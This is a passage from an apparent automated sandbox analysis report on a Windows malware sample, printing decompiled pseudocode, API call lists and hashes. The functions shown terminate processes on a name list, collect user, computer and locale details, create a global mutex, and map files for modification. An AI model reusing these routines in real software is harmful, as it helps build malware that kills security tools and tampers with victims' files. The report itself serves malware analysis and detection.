							_t65 = OpenProcess(1, _t51,  *(_t60 + 8));
							if(_t65 != 0) {
								TerminateProcess(_t65, 0);
								CloseHandle(_t65);
							}
						}
						_t71 = _t71 + 1;
						_t46 = _t60 + 0x24; // 0x24
						_t62 = _t46;
					} while (_t71 < 0x27);
					_t72 = _v172;
					_t52 = Process32NextW(_t72, _t60);
					_t48 = _t60 + 0x24; // 0x24
					_t62 = _t48;
				} while (_t52 != 0);
				if(_t60 != 0) {
					VirtualFree(_t60, 0, 0x8000); // executed
				}
				_t53 = FindCloseChangeNotification(_t72); // executed
				return _t53;
			}

0x0f4e48c6
0x0f4e48d3
0x0f4e48db
0x0f4e48e3
0x0f4e48eb
0x0f4e48f3
0x0f4e48fb
0x0f4e4903
0x0f4e490b
0x0f4e4913
0x0f4e491b
0x0f4e4923
0x0f4e492b
0x0f4e4933
0x0f4e493b
0x0f4e4943
0x0f4e494b
0x0f4e4953
0x0f4e495b
0x0f4e4963
0x0f4e496b
0x0f4e4973
0x0f4e497b
0x0f4e4983
0x0f4e498b
0x0f4e4993
0x0f4e499b
0x0f4e49a3
0x0f4e49ae
0x0f4e49b9
0x0f4e49c4
0x0f4e49cf
0x0f4e49da
0x0f4e49e5
0x0f4e49f0
0x0f4e49fb
0x0f4e4a06
0x0f4e4a11
0x0f4e4a1c
0x0f4e4a27
0x0f4e4a32
0x0f4e4a44
0x0f4e4a48
0x0f4e4a4c
0x0f4e4a52
0x0f4e4a56
0x0f4e4a58
0x0f4e4a61
0x0f4e4a63
0x0f4e4a65
0x0f4e4a65
0x0f4e4a61
0x0f4e4a71
0x0f4e4a71
0x0f4e4a74
0x0f4e4a74
0x0f4e4a80
0x0f4e4a85
0x0f4e4a8d
0x0f4e4a9b
0x0f4e4a9f
0x0f4e4aa4
0x0f4e4ab1
0x0f4e4ab1
0x0f4e4a9f
0x0f4e4abb
0x0f4e4abc
0x0f4e4abc
0x0f4e4abf
0x0f4e4ac4
0x0f4e4aca
0x0f4e4ad0
0x0f4e4ad0
0x0f4e4ad3
0x0f4e4ad9
0x0f4e4ae3
0x0f4e4ae3
0x0f4e4aea
0x0f4e4af2

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0F4E4A32
VirtualAlloc.KERNEL32(00000000,0000022C,00003000,00000004), ref: 0F4E4A4C
Process32FirstW.KERNEL32(00000000,00000000), ref: 0F4E4A65
lstrcmpiW.KERNEL32(00000002,00000024), ref: 0F4E4A85
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0F4E4A95
TerminateProcess.KERNEL32(00000000,00000000), ref: 0F4E4AA4
CloseHandle.KERNEL32(00000000), ref: 0F4E4AB1
Process32NextW.KERNEL32(?,00000000), ref: 0F4E4ACA
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F4E4AE3
FindCloseChangeNotification.KERNEL32(?), ref: 0F4E4AEA

Strings

iqt, xrefs: 0F4E4A85

Memory Dump Source

Source File: 00000000.00000002.335664192.000000000F4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F4E0000, based on PE: true

Associated: 00000000.00000002.335620830.000000000F4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335683978.000000000F4F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4e0000_wThN5MTIsw.jbxd

Yara matches

Similarity

API ID: CloseProcessProcess32Virtual$AllocChangeCreateFindFirstFreeHandleNextNotificationOpenSnapshotTerminateToolhelp32lstrcmpi
String ID: iqt
API String ID: 3023235786-2805759263
Opcode ID: bbdd9c86ebbd9ca6f8822e4664c22b9adfd1398d76588ad1758789fc0a516b2e
Instruction ID: 188fde1d336782c3983067fa1c79144ac7fd8f34ab23e5e61fe5bea053dadaeb
Opcode Fuzzy Hash: bbdd9c86ebbd9ca6f8822e4664c22b9adfd1398d76588ad1758789fc0a516b2e
Instruction Fuzzy Hash: DE5128B51083809FD720CF20984879BBFE4BB9173AF60890EED985A253C770994DCF96

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E47D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 83stringmemorysynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0F4E3BC0: GetProcessHeap.KERNEL32(?,?,0F4E4807,00000000,?,00000000,00000000), ref: 0F4E3C5C

Part of subcall function 0F4E7490: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0F4E74B7
Part of subcall function 0F4E7490: GetUserNameW.ADVAPI32(00000000,?), ref: 0F4E74C8
Part of subcall function 0F4E7490: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0F4E74E6
Part of subcall function 0F4E7490: GetComputerNameW.KERNEL32 ref: 0F4E74F0
Part of subcall function 0F4E7490: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F4E7510
Part of subcall function 0F4E7490: wsprintfW.USER32 ref: 0F4E7551
Part of subcall function 0F4E7490: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F4E756E
Part of subcall function 0F4E7490: RegOpenKeyExW.KERNEL32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0F4E7592
Part of subcall function 0F4E7490: RegQueryValueExW.KERNEL32(00000000,LocaleName,00000000,00000000,0F4E4810,?), ref: 0F4E75B6
Part of subcall function 0F4E7490: RegCloseKey.KERNEL32(00000000), ref: 0F4E75D2

Part of subcall function 0F4E72A0: lstrlenW.KERNEL32(?,?,?,?,0F4E4819,00000000,?,00000000,00000000,?,00000000), ref: 0F4E72F2
Part of subcall function 0F4E72A0: lstrlenW.KERNEL32(?,?,?,?,0F4E4819,00000000,?,00000000,00000000,?,00000000), ref: 0F4E72FD
Part of subcall function 0F4E72A0: lstrlenW.KERNEL32(?,?,?,?,0F4E4819,00000000,?,00000000,00000000,?,00000000), ref: 0F4E7313
Part of subcall function 0F4E72A0: lstrlenW.KERNEL32(?,?,?,?,0F4E4819,00000000,?,00000000,00000000,?,00000000), ref: 0F4E731E
Part of subcall function 0F4E72A0: lstrlenW.KERNEL32(?,?,?,?,0F4E4819,00000000,?,00000000,00000000,?,00000000), ref: 0F4E7334
Part of subcall function 0F4E72A0: lstrlenW.KERNEL32(?,?,?,?,0F4E4819,00000000,?,00000000,00000000,?,00000000), ref: 0F4E733F
Part of subcall function 0F4E72A0: lstrlenW.KERNEL32(?,?,?,?,0F4E4819,00000000,?,00000000,00000000,?,00000000), ref: 0F4E7355
Part of subcall function 0F4E72A0: lstrlenW.KERNEL32(0F4E4B36,?,?,?,0F4E4819,00000000,?,00000000,00000000,?,00000000), ref: 0F4E7360
Part of subcall function 0F4E72A0: lstrlenW.KERNEL32(?,?,?,?,0F4E4819,00000000,?,00000000,00000000,?,00000000), ref: 0F4E7376
Part of subcall function 0F4E72A0: lstrlenW.KERNEL32(?,?,?,?,0F4E4819,00000000,?,00000000,00000000,?,00000000), ref: 0F4E7381
Part of subcall function 0F4E72A0: lstrlenW.KERNEL32(?,?,?,?,0F4E4819,00000000,?,00000000,00000000,?,00000000), ref: 0F4E7397
Part of subcall function 0F4E72A0: lstrlenW.KERNEL32(?,?,?,?,0F4E4819,00000000,?,00000000,00000000,?,00000000), ref: 0F4E73A2
Part of subcall function 0F4E72A0: lstrlenW.KERNEL32(?,?,?,?,0F4E4819,00000000,?,00000000,00000000,?,00000000), ref: 0F4E73C1
Part of subcall function 0F4E72A0: lstrlenW.KERNEL32(?,?,?,?,0F4E4819,00000000,?,00000000,00000000,?,00000000), ref: 0F4E73CC

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F4E482C
lstrcpyW.KERNEL32 ref: 0F4E484F
lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F4E4856
CreateMutexW.KERNEL32(00000000,00000000,00000000,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F4E486E
GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F4E487A
GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F4E4881
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F4E489B

Strings

Global\, xrefs: 0F4E4849

Memory Dump Source

Source File: 00000000.00000002.335664192.000000000F4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F4E0000, based on PE: true

Associated: 00000000.00000002.335620830.000000000F4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335683978.000000000F4F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4e0000_wThN5MTIsw.jbxd

Yara matches

Similarity

API ID: lstrlen$Virtual$Alloc$ErrorLastName$CloseComputerCreateFreeHeapMutexOpenProcessQueryUserValuelstrcpywsprintf
String ID: Global\
API String ID: 3131499543-188423391
Opcode ID: e20e5ceb0c18c70b0620f5ff0d2c3087b0d4c43c4a1b553b2cdadc384643ba3d
Instruction ID: 535b9132074e458d848732b9b147c6a9e9306d8b8d46d1f5b43e1531defd9ec1
Opcode Fuzzy Hash: e20e5ceb0c18c70b0620f5ff0d2c3087b0d4c43c4a1b553b2cdadc384643ba3d
Instruction Fuzzy Hash: 7A213B316503117BE334EB24DC4AFBF7B5CEB40762F500229FE056A0D1AA987D04C2E5

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E4A78 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 46
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F4E4A78(void* __ebx, WCHAR* __ecx, void* __esi, void* __ebp, void* _a12) {
				int _t8;
				int _t9;
				int _t10;
				void* _t15;
				WCHAR* _t17;
				void* _t18;
				signed int _t23;
				void* _t24;
				void* _t28;

				_t17 = __ecx;
				_t15 = __ebx;
				while(1) {
					L2:
					_t8 = lstrcmpiW( *(_t28 + 0x14 + _t23 * 4), _t17);
					if(_t8 == 0) {
						_t18 = OpenProcess(1, _t8,  *(_t15 + 8));
						if(_t18 != 0) {
							TerminateProcess(_t18, 0);
							CloseHandle(_t18);
						}
					}
					_t23 = _t23 + 1;
					_t5 = _t15 + 0x24; // 0x24
					_t17 = _t5;
					if(_t23 < 0x27) {
						continue;
					}
					L7:
					_t24 = _a12;
					_t9 = Process32NextW(_t24, _t15);
					_t7 = _t15 + 0x24; // 0x24
					_t17 = _t7;
					if(_t9 != 0) {
						_t23 = 0;
						do {
							goto L2;
						} while (_t23 < 0x27);
						goto L7;
					}
					if(_t15 != 0) {
						VirtualFree(_t15, 0, 0x8000); // executed
					}
					_t10 = FindCloseChangeNotification(_t24); // executed
					return _t10;
					L2:
					_t8 = lstrcmpiW( *(_t28 + 0x14 + _t23 * 4), _t17);
					if(_t8 == 0) {
						_t18 = OpenProcess(1, _t8,  *(_t15 + 8));
						if(_t18 != 0) {
							TerminateProcess(_t18, 0);
							CloseHandle(_t18);
						}
					}
					_t23 = _t23 + 1;
					_t5 = _t15 + 0x24; // 0x24
					_t17 = _t5;
				}
			}

0x0f4e4a78
0x0f4e4a78
0x0f4e4a80
0x0f4e4a80
0x0f4e4a85
0x0f4e4a8d
0x0f4e4a9b
0x0f4e4a9f
0x0f4e4aa4
0x0f4e4ab1
0x0f4e4ab1
0x0f4e4a9f
0x0f4e4abb
0x0f4e4abc
0x0f4e4abc
0x0f4e4ac2
0x00000000
0x00000000
0x0f4e4ac4
0x0f4e4ac4
0x0f4e4aca
0x0f4e4ad0
0x0f4e4ad0
0x0f4e4ad5
0x0f4e4a74
0x0f4e4a80
0x00000000
0x00000000
0x00000000
0x0f4e4a80
0x0f4e4ad9
0x0f4e4ae3
0x0f4e4ae3
0x0f4e4aea
0x0f4e4af2
0x0f4e4a80
0x0f4e4a85
0x0f4e4a8d
0x0f4e4a9b
0x0f4e4a9f
0x0f4e4aa4
0x0f4e4ab1
0x0f4e4ab1
0x0f4e4a9f
0x0f4e4abb
0x0f4e4abc
0x0f4e4abc
0x0f4e4abf

APIs

lstrcmpiW.KERNEL32(00000002,00000024), ref: 0F4E4A85
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0F4E4A95
TerminateProcess.KERNEL32(00000000,00000000), ref: 0F4E4AA4
CloseHandle.KERNEL32(00000000), ref: 0F4E4AB1
Process32NextW.KERNEL32(?,00000000), ref: 0F4E4ACA
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F4E4AE3
FindCloseChangeNotification.KERNEL32(?), ref: 0F4E4AEA

Strings

iqt, xrefs: 0F4E4A85

Memory Dump Source

Source File: 00000000.00000002.335664192.000000000F4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F4E0000, based on PE: true

Associated: 00000000.00000002.335620830.000000000F4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335683978.000000000F4F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4e0000_wThN5MTIsw.jbxd

Yara matches

Similarity

API ID: CloseProcess$ChangeFindFreeHandleNextNotificationOpenProcess32TerminateVirtuallstrcmpi
String ID: iqt
API String ID: 3573210778-2805759263
Opcode ID: f422b2a97743edf080eded4123f21eaf7360be2ebe7e7753b9ced0ec6ef5e211
Instruction ID: d2c8920955b7fb6b2997191c563c5ba521ea7b65f388038b4f978883c0477723
Opcode Fuzzy Hash: f422b2a97743edf080eded4123f21eaf7360be2ebe7e7753b9ced0ec6ef5e211
Instruction Fuzzy Hash: E201FE36300111AFD720DF50AC88BDB7B6DEF84333F314015FD099A152D73498158B95

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E35C0 Relevance: 13.6, APIs: 9, Instructions: 94
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F4E35C0(intOrPtr __ecx, intOrPtr __edx) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				long _v24;
				void* _t12;
				void* _t14;
				long _t17;
				void* _t18;
				int _t21;
				void* _t25;
				char* _t29;
				void* _t37;
				void* _t39;

				_v16 = __edx;
				_v20 = __ecx;
				_v12 = 0;
				_t12 = VirtualAlloc(0, 0xa00, 0x3000, 4); // executed
				_t39 = _t12;
				if(_t39 != 0) {
					GetModuleFileNameW(0, _t39, 0x100);
					_t14 = CreateFileW(_t39, 0x80000000, 1, 0, 3, 0, 0); // executed
					_t37 = _t14;
					if(_t37 != 0xffffffff) {
						_t17 = GetFileSize(_t37, 0);
						_v8 = _t17;
						_t18 = VirtualAlloc(0, _t17, 0x3000, 4); // executed
						_t25 = _t18;
						if(_t25 != 0) {
							_t21 = ReadFile(_t37, _t25, _v8,  &_v24, 0); // executed
							if(_t21 != 0) {
								_t29 = _v8 - 1 + _t25;
								if( *_t29 != 0) {
									do {
										_t29 = _t29 - 1;
									} while ( *_t29 != 0);
									E0F4E34F0(_t29 + 1, _v20, _v16);
									_t32 =  !=  ? 1 : 0;
									_v12 =  !=  ? 1 : 0;
								}
							}
							VirtualFree(_t25, 0, 0x8000); // executed
						}
						FindCloseChangeNotification(_t37); // executed
					}
					VirtualFree(_t39, 0, 0x8000); // executed
					return _v12;
				} else {
					return _t12;
				}
			}

0x0f4e35dc
0x0f4e35df
0x0f4e35e2
0x0f4e35e9
0x0f4e35eb
0x0f4e35ef
0x0f4e3600
0x0f4e3616
0x0f4e361c
0x0f4e3621
0x0f4e3626
0x0f4e3636
0x0f4e3639
0x0f4e363b
0x0f4e363f
0x0f4e364c
0x0f4e3654
0x0f4e365a
0x0f4e365f
0x0f4e3661
0x0f4e3661
0x0f4e3662
0x0f4e366e
0x0f4e367f
0x0f4e3682
0x0f4e3682
0x0f4e365f
0x0f4e368d
0x0f4e368d
0x0f4e3694
0x0f4e3694
0x0f4e36a2
0x0f4e36b1
0x0f4e35f6
0x0f4e35f6
0x0f4e35f6

APIs

VirtualAlloc.KERNEL32(00000000,00000A00,00003000,00000004,?,74716980), ref: 0F4E35E9
GetModuleFileNameW.KERNEL32(00000000,00000000,00000100,747582B0), ref: 0F4E3600
CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0F4E3616
GetFileSize.KERNEL32(00000000,00000000), ref: 0F4E3626
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0F4E3639
ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 0F4E364C
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F4E368D
FindCloseChangeNotification.KERNEL32(00000000), ref: 0F4E3694
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F4E36A2

Memory Dump Source

Source File: 00000000.00000002.335664192.000000000F4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F4E0000, based on PE: true

Associated: 00000000.00000002.335620830.000000000F4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335683978.000000000F4F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4e0000_wThN5MTIsw.jbxd

Yara matches

Similarity

API ID: FileVirtual$AllocFree$ChangeCloseCreateFindModuleNameNotificationReadSize
String ID:
API String ID: 511603811-0
Opcode ID: 9e8fbf81f263ce173b4cffb9c01279a6fcda27acb22334541f40695c7ff033ad
Instruction ID: 939feb2bae8c2f2b206068e87dd45931629a2bbe23e4d91a7bf5f763fc6e9e0d
Opcode Fuzzy Hash: 9e8fbf81f263ce173b4cffb9c01279a6fcda27acb22334541f40695c7ff033ad
Instruction Fuzzy Hash: 6F21A631B403147BF7269BA49C86FEEBF68AB45726F200059FF05AA3C2C6B8A5118754

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E7D70 Relevance: 12.6, APIs: 10, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F4E7D70(intOrPtr* __ecx) {
				int _t20;
				intOrPtr* _t24;

				_t24 = __ecx;
				if( *__ecx != 0) {
					_t20 = VirtualFree( *(__ecx + 8), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0xc)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x14), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x18)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x20), 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t24 + 0x30)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x38), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x3c)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x44), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x48)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x50), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x54)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x5c), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x24)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x2c), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x60)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x68), 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t24 + 0x80)) != 0) {
					return VirtualFree( *(_t24 + 0x84), 0, 0x8000);
				}
				return _t20;
			}

0x0f4e7d71
0x0f4e7d7d
0x0f4e7d89
0x0f4e7d89
0x0f4e7d8f
0x0f4e7d9b
0x0f4e7d9b
0x0f4e7da1
0x0f4e7dad
0x0f4e7dad
0x0f4e7db3
0x0f4e7dbf
0x0f4e7dbf
0x0f4e7dc5
0x0f4e7dd1
0x0f4e7dd1
0x0f4e7dd7
0x0f4e7de3
0x0f4e7de3
0x0f4e7de9
0x0f4e7df5
0x0f4e7df5
0x0f4e7dfb
0x0f4e7e07
0x0f4e7e07
0x0f4e7e0d
0x0f4e7e19
0x0f4e7e19
0x0f4e7e22
0x00000000
0x0f4e7e31
0x0f4e7e35

APIs

VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F4E48AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F4E7D89
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F4E48AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F4E7D9B
VirtualFree.KERNELBASE(?,00000000,00008000,00000000,00000001,0F4E48AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F4E7DAD
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F4E48AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F4E7DBF
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F4E48AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F4E7DD1
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F4E48AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F4E7DE3
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F4E48AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F4E7DF5
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F4E48AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F4E7E07
VirtualFree.KERNELBASE(?,00000000,00008000,00000000,00000001,0F4E48AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F4E7E19
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F4E48AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F4E7E31

Memory Dump Source

Source File: 00000000.00000002.335664192.000000000F4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F4E0000, based on PE: true

Associated: 00000000.00000002.335620830.000000000F4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335683978.000000000F4F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4e0000_wThN5MTIsw.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 85b2d7bf6386935d5eac27899dc46d7bbee0ffba3e2176fc1283defc488a8bef
Instruction ID: 083fcc149dfabdf23729ad8098773b22dcf53d2d76c104290de953856c6fb837
Opcode Fuzzy Hash: 85b2d7bf6386935d5eac27899dc46d7bbee0ffba3e2176fc1283defc488a8bef
Instruction Fuzzy Hash: CB211F30280B00AAE7761A15DC0AFA7B6E1BF40B16F65493DE6D2249F1CBF57499DF04

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E2890 Relevance: 12.1, APIs: 8, Instructions: 90
fileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0F4E2890(WCHAR* __ecx, intOrPtr __edx) {
				long _v8;
				intOrPtr _v12;
				void* _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t9;
				signed int _t14;
				void* _t18;
				void* _t19;
				void* _t23;
				struct _SECURITY_ATTRIBUTES* _t24;
				WCHAR* _t29;
				void* _t34;
				signed int _t35;
				long _t37;
				void* _t38;
				void* _t40;

				_t29 = __ecx;
				_t28 = 0;
				_v12 = __edx;
				_t9 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0); // executed
				_t34 = _t9;
				if(_t34 == 0xffffffff) {
					L3:
					return 0;
				} else {
					_v8 = GetFileSize(_t34, 0);
					E0F4E3030(0, _t34, _t35); // executed
					asm("sbb esi, esi");
					_t37 = (_t35 & 0x00000003) + 1;
					_t14 = E0F4E3030(0, _t34, _t37);
					asm("sbb eax, eax");
					_t18 = CreateFileMappingW(_t34, 0, ( ~_t14 & 0xfffffffa) + 8, 0, 0, 0); // executed
					_v16 = _t18;
					if(_t18 != 0) {
						_t19 = MapViewOfFile(_t18, _t37, 0, 0, 0); // executed
						_t38 = _t19;
						if(_t38 != 0) {
							_t23 = E0F4E3030(0, _t34, _t38); // executed
							if(_t23 == 0) {
								_push(_t29);
								_t4 = _t38 + 0x53; // 0x53
								_t29 = _t4;
								_t5 = _t23 + 6; // 0x6, executed
								E0F4E8400(_t29, _t5); // executed
								_t40 = _t40 + 4;
							}
							_push(_t29);
							_t24 = E0F4E2830(_v12, _t38, _v8); // executed
							_t28 = _t24;
							UnmapViewOfFile(_t38);
						}
						CloseHandle(_v16);
						CloseHandle(_t34);
						return _t28;
					} else {
						CloseHandle(_t34);
						goto L3;
					}
				}
			}

0x0f4e2890
0x0f4e2899
0x0f4e289b
0x0f4e28ab
0x0f4e28b1
0x0f4e28b6
0x0f4e28f9
0x0f4e2901
0x0f4e28b8
0x0f4e28c0
0x0f4e28c3
0x0f4e28ca
0x0f4e28cf
0x0f4e28d0
0x0f4e28d8
0x0f4e28e5
0x0f4e28eb
0x0f4e28f0
0x0f4e290a
0x0f4e2910
0x0f4e2914
0x0f4e2916
0x0f4e291d
0x0f4e291f
0x0f4e2920
0x0f4e2920
0x0f4e2923
0x0f4e2926
0x0f4e292b
0x0f4e292b
0x0f4e292e
0x0f4e2937
0x0f4e293f
0x0f4e2942
0x0f4e2942
0x0f4e2951
0x0f4e2954
0x0f4e295e
0x0f4e28f2
0x0f4e28f3
0x00000000
0x0f4e28f3
0x0f4e28f0

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,747582B0,00000000,?,?,0F4E2C02), ref: 0F4E28AB
GetFileSize.KERNEL32(00000000,00000000,?,?,0F4E2C02), ref: 0F4E28BA
CreateFileMappingW.KERNELBASE(00000000,00000000,-00000008,00000000,00000000,00000000,?,?,0F4E2C02), ref: 0F4E28E5
CloseHandle.KERNEL32(00000000,?,?,0F4E2C02), ref: 0F4E28F3
MapViewOfFile.KERNEL32(00000000,747582B1,00000000,00000000,00000000,?,?,0F4E2C02), ref: 0F4E290A
UnmapViewOfFile.KERNEL32(00000000,?,?,?,?,0F4E2C02), ref: 0F4E2942
CloseHandle.KERNEL32(?,?,?,0F4E2C02), ref: 0F4E2951
CloseHandle.KERNEL32(00000000,?,?,0F4E2C02), ref: 0F4E2954

Memory Dump Source

Source File: 00000000.00000002.335664192.000000000F4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F4E0000, based on PE: true

Associated: 00000000.00000002.335620830.000000000F4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335683978.000000000F4F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4e0000_wThN5MTIsw.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateView$MappingSizeUnmap
String ID:
API String ID: 265113797-0
Opcode ID: 2370e68f172025602d1fa10af35a1ac4bf365ee299e090bfd217724957644e2f
Instruction ID: a6b30e34dd55b1d362b28ea2d6025d8c98fe2c14e1905c77b52dc302ceb0b334
Opcode Fuzzy Hash: 2370e68f172025602d1fa10af35a1ac4bf365ee299e090bfd217724957644e2f
Instruction Fuzzy Hash: 402126B1E002187FE711AB759C85FBFBF6CEB45676F00026AFC01E7282E6789E1545A1

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E7410 Relevance: 7.5, APIs: 5, Instructions: 47
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F4E7410(void* __ecx, void* _a4, int _a8, short* _a12, char* _a16, short* _a20) {
				void* _v8;
				long _t14;
				long _t18;

				_t14 = RegOpenKeyExW(_a4, _a8, 0, 0x20019,  &_v8); // executed
				if(_t14 != 0) {
					return 0;
				} else {
					_a8 = _a20;
					_t18 = RegQueryValueExW(_v8, _a12, 0, 0, _a16,  &_a8); // executed
					if(_t18 != 0) {
						GetLastError();
						RegCloseKey(_v8);
						return 0;
					} else {
						_t11 = _t18 + 1; // 0x1, executed
						RegCloseKey(_v8); // executed
						return _t11;
					}
				}
			}

0x0f4e7426
0x0f4e7430
0x0f4e7484
0x0f4e7432
0x0f4e7435
0x0f4e7447
0x0f4e744f
0x0f4e7466
0x0f4e746f
0x0f4e747b
0x0f4e7451
0x0f4e7454
0x0f4e7457
0x0f4e7463
0x0f4e7463
0x0f4e744f

APIs

